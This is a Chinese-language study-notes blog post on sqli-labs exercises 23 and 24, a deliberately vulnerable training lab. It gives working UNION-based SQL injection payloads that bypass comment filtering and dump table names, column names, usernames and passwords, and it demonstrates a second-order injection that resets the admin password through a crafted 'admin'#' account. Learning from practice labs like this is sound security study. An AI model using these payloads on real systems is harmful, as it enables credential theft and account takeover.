sqli-labs学习笔记（八）less 23-24

前言

继续学习sqli-labs
本篇是less 23-24

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

测试

?id=1'

然后尝试#、--+等注释
都无用
看了眼源码

注释都被替换掉了
尝试闭合

?id=-1' union select 1, 2, 3 '

?id=-1' union select 1, database(), 3 '

注入成功
后面的注入就很简单了

?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3'
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3'
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)'

完成注入

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

一开始尝试直接注入
没反应

然后看了看源码

在改密码的源码里可以操作

注册

user：admin'#
passwd：123

并登录

把密码改为123456
logout

然后再登录时发现

• admin'#的密码仍然是123
• admin的密码被改为123456

这是因为改密码时
sql语句变成

 $sql = "UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='$curr_pass' ";

也就是说
执行了

 UPDATE users SET passwd="New_Pass" WHERE username ='admin'

即把admin的数据update了

本题的意义在于展示如何利用改密码的漏洞
进行二次注入
修改原来就存在的用户的密码

结语

学习了新知识

• 注释符被替换掉
• 二次注入改原用户密码